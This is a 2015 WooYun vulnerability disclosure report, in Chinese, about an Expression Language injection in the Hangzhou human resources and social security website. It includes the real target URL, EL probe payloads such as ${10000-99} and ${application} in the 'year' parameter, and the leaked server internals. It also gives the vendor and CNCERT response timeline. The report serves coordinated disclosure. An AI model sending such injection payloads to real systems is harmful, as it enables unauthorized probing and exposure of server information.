当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107171

漏洞标题:杭州市人力资源和社会保障网Expression language injection(可利用)

相关厂商:杭州市人力资源和社会保障局

漏洞作者: 暗羽

提交时间:2015-04-13 13:05

修复时间:2015-05-30 14:00

公开时间:2015-05-30 14:00

漏洞类型:命令执行

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-13: 细节已通知厂商并且等待厂商处理中
2015-04-15: 厂商已经确认,细节仅向厂商公开
2015-04-25: 细节向核心白帽子及相关领域专家公开
2015-05-05: 细节向普通白帽子公开
2015-05-15: 细节向实习白帽子公开
2015-05-30: 细节向公众公开

简要描述:

Expression language injection

详细说明:

站点:http://www.zjhz.lss.gov.cn/
测试连接:http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d
效果如图:

QQ截图20150410205845.png


测试方法是参照这个的:
大众点评某站点Expression language injection | WooYun-2014-71160 | WooYun.org
WooYun: 大众点评某站点Expression language injection
应该是这样玩的吧(⊙v⊙)

漏洞证明:

http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d

QQ截图20150410205845.png


view-source:http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=${application}

<script src="/web/resource/script/list_utf8.js?year=%7Borg.directwebremoting.Container%3Dorg.directwebremoting.impl.DefaultContainer%406f55455e%2C+org.directwebremoting.ContainerList%3D%5Borg.directwebremoting.impl.DefaultContainer%406f55455e%5D%2C+__oscache_cache%3Dcom.opensymphony.oscache.web.ServletCache%406c70a195%2C+__oscache_cache_admin%3Dcom.opensymphony.oscache.web.ServletCacheAdministrator%40b7571b5%2C+weblogic.servlet.WebAppComponentRuntimeMBean%3Dweblogic.servlet.internal.WebAppRuntimeMBeanImpl%4026c66b4a%2C+org.springframework.web.context.WebApplicationContext.ROOT%3Dorg.springframework.web.context.support.XmlWebApplicationContext%4036e79009%3A+display+name+%5BRoot+WebApplicationContext%5D%3B+startup+date+%5BTue+Feb+10+17%3A32%3A25+CST+2015%5D%3B+root+of+context+hierarchy%2C+__oscache_admins%3D%7B__oscache_cache_admin%3Dcom.opensymphony.oscache.web.ServletCacheAdministrator%40b7571b5%7D%2C+org.directwebremoting.WebContextFactory%24WebContextBuilder%3Dorg.directwebremoting.impl.DefaultWebContextBuilder%404ed39061%2C+javax.servlet.context.tempdir%3D%2Fopt%2FMiddleware%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2Fapp1%2Ftmp%2F_WL_user%2Fweb%2Faakfdm%2Fpublic%2C+javax.servlet.ServletConfig%3Dweblogic.servlet.internal.ServletStubImpl%404422e93c+-+dwr-invoker+class%3A+%27uk.ltd.getahead.dwr.DWRServlet%27%2C+freemarker.Configuration%3Dfreemarker.template.Configuration%404b7c27f3%2C+weblogic.servlet.WebAppComponentMBean%3Dweblogic.management.configuration.WebAppComponentMBeanImpl%401a3b23f1%28%5Bbase_domain%5D%2FApplications%5Bweb%5D%2FWebAppComponents%5Bweb%5D%29%2C+org.directwebremoting.impl.ServerContext%3Dorg.directwebremoting.impl.DefaultServerContext%40568074d1%2C+contextConfigLocation%3D%2FWEB-INF%2Fclasses%2FapplicationContext.xml%2C+com.sun.faces.config.WebConfiguration%3Dcom.sun.faces.config.WebConfiguration%4023abf8b5%2C+javax.servlet.http.HttpServlet%3Duk.ltd.getahead.dwr.DWRServlet%404ffe8516%7D"></script>


修复方案:

版权声明:转载请注明来源 暗羽@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-04-15 14:00

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给浙江分中心,由浙江分中心后续协调网站管理单位处置

最新状态:

暂无